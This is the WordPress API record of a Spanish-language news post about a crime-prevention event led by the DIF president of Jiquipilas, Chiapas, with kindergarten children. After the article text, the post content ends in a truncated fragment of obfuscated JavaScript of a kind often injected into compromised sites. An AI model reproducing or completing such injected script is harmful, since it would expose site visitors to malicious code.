{"id":3586,"date":"2022-07-14T02:16:50","date_gmt":"2022-07-14T02:16:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3586"},"modified":"2022-07-14T02:16:52","modified_gmt":"2022-07-14T02:16:52","slug":"madely-montejo-impulsa-politicas-publicas-y-sociales-a-favor-de-la-prevencion-del-delito-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3586","title":{"rendered":"Madely Montejo impulsa pol\u00edticas p\u00fablicas y sociales a favor de la prevenci\u00f3n del delito en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0048-1024x574.jpg\" alt=\"\" class=\"wp-image-3587\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0048-1024x574.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0048-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0048-768x430.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0048.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Lograr la concientizaci\u00f3n familiar e implementar m\u00e9todos estrat\u00e9gicos en niveles educativos.<\/p>\n\n\n\n<p>\u2022 La Presidenta del DIF refrend\u00f3 su compromiso con las familias jiquipiltecas para trabajar en la prevenci\u00f3n del delito.<\/p>\n\n\n\n<p> 13 de Julio del 2022.  Jiquipilas, Chiapas. \u2013 Con el objetivo de impulsar pol\u00edticas publicas que favorezcan a la integridad f\u00edsica y psicol\u00f3gica a trav\u00e9s de la promoci\u00f3n de la prevenci\u00f3n del delito, la presidenta del DIF Jiquipilas Madely Montejo Maza acompa\u00f1ada de alumnos, madres de familia y maestros, adem\u00e1s de personal del ayuntamiento acudieron a realizar una pinta de barda con las manos de las ni\u00f1as y ni\u00f1os del jard\u00edn de ni\u00f1os \u201cMiguel Alem\u00e1n\u201d. Dentro de las actividades que se efectuaron, se destac\u00f3 la ilustraci\u00f3n de una barda con mensajes y manos de ni\u00f1os y ni\u00f1as con colores representativos al alto de violencia e igualdad para todos y todas.Madely Montejo dijo sentirse feliz de ver el inter\u00e9s de madres y padres de familias, as\u00ed como inculcar nueva cultura \u00e9tica en la ni\u00f1es que se encamina a un mejor futuro Jiquipilteco; recalc\u00f3 que pone a disposici\u00f3n las \u00e1reas de Procuradur\u00eda municipal para la protecci\u00f3n de ni\u00f1as, ni\u00f1os, adolescentes y la familia, prevenci\u00f3n del delito y derechos humanos, \u00e1reas responsables para lograr acciones en conjunto y favorecer a una estabilidad social libre de violencia.Para finalizar se imparti\u00f3 una pl\u00e1tica para lograr fortalecer la relaci\u00f3n entre familiares y ni\u00f1ez, basada en el respeto, inclusi\u00f3n y la igualdad; se hizo menci\u00f3n que la vigilancia de cada movimiento o actividad realizada debe estar monitoreada por los adultos, para evitar acciones inestables privadas y lograr actuar en momentos justo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Lograr la concientizaci\u00f3n familiar e implementar m\u00e9todos estrat\u00e9gicos en niveles educativos. \u2022 La Presidenta del DIF refrend\u00f3 su compromiso con las familias jiquipiltecas para trabajar en la prevenci\u00f3n del delito. 13 de Julio del 2022. Jiquipilas, Chiapas. \u2013 Con el objetivo de impulsar pol\u00edticas publicas que favorezcan a la integridad f\u00edsica y psicol\u00f3gica a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3587,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3586","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3586","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3586"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3586\/revisions"}],"predecessor-version":[{"id":3588,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3586\/revisions\/3588"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3587"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3586"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3586"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3586"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}